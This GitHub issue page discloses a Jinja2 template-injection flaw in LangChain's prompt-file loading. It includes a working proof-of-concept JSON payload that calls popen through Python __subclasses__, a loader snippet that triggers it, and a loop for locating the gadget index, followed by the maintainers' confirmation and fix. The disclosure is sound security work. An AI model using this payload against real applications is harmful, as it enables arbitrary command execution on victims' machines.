Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Template injection to arbitrary code execution #4394

Closed
2 of 14 tasks
r3pwnx opened this issue May 9, 2023 · 4 comments · Fixed by #10252
Closed
2 of 14 tasks

Template injection to arbitrary code execution #4394

r3pwnx opened this issue May 9, 2023 · 4 comments · Fixed by #10252

Comments

@r3pwnx
Copy link

r3pwnx commented May 9, 2023

System Info

windows 11

Who can help?

No response

Information

  • The official example notebooks/scripts
  • My own modified scripts

Related Components

  • LLMs/Chat Models
  • Embedding Models
  • Prompts / Prompt Templates / Prompt Selectors
  • Output Parsers
  • Document Loaders
  • Vector Stores / Retrievers
  • Memory
  • Agents / Agent Executors
  • Tools / Toolkits
  • Chains
  • Callbacks/Tracing
  • Async

Reproduction

  1. save the following data to pt.json
{
    "input_variables": [
        "prompt"
    ],
    "output_parser": null,
    "partial_variables": {},
    "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
    "template_format": "jinja2",
    "validate_template": true,
    "_type": "prompt"
}
  1. run
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
  1. the dir command will be execute

attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the template has payload, the index of __subclasses__ maybe different in other environment.

Expected behavior

code should not be execute

@r3pwnx
Copy link
Author

r3pwnx commented May 9, 2023

The index of "subclasses " can be obtained in the following way.

target = 'popen'   
num = -1
for i in ''.__class__.__bases__[0].__subclasses__():
    num += 1
    try:
        if target in i.__init__.__globals__.keys():
            print(i, num)
    except:
        pass

@dosubot

This comment was marked as outdated.

@dosubot dosubot bot added the stale Issue has not had recent activity or appears to be solved. Stale issues will be automatically closed label Aug 29, 2023
@obi1kenobi obi1kenobi removed the stale Issue has not had recent activity or appears to be solved. Stale issues will be automatically closed label Aug 29, 2023
@obi1kenobi
Copy link
Collaborator

Sorry for the bot reply, it's still a beta and shouldn't be attempting to close security-related issues like this. I'm triaging this right now and should have an update shortly.

@obi1kenobi
Copy link
Collaborator

Issue confirmed, escalating to security@langchain.dev.

Apologies for the delay here. This issue slipped through the cracks, which should not have happened. We're going to use this instance as an internal case study to make sure we do way better in the future.

We've already added a SECURITY.md to the repo so that GitHub directs users to send security-related information to security@langchain.dev to ensure any security-related issues are promptly acted upon: #9551

We're also looking at automation to help us detect security-related issues opened on public GitHub, so we can more effectively internally escalate it to security@langchain.dev as well.

obi1kenobi added a commit that referenced this issue Sep 5, 2023
jinja2 templates are not sandboxed and are at risk for arbitrary code
execution. To mitigate this risk:
- We no longer support loading jinja2-formatted prompt template files.
- `PromptTemplate` with jinja2 may still be constructed manually, but
  the class carries a security warning reminding the user to not pass
  untrusted input into it.

Resolves #4394.
obi1kenobi added a commit that referenced this issue Oct 10, 2023
jinja2 templates are not sandboxed and are at risk for arbitrary code
execution. To mitigate this risk:
- We no longer support loading jinja2-formatted prompt template files.
- `PromptTemplate` with jinja2 may still be constructed manually, but
the class carries a security warning reminding the user to not pass
untrusted input into it.

Resolves #4394.
hoanq1811 pushed a commit to hoanq1811/langchain that referenced this issue Feb 2, 2024
jinja2 templates are not sandboxed and are at risk for arbitrary code
execution. To mitigate this risk:
- We no longer support loading jinja2-formatted prompt template files.
- `PromptTemplate` with jinja2 may still be constructed manually, but
the class carries a security warning reminding the user to not pass
untrusted input into it.

Resolves langchain-ai#4394.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

2 participants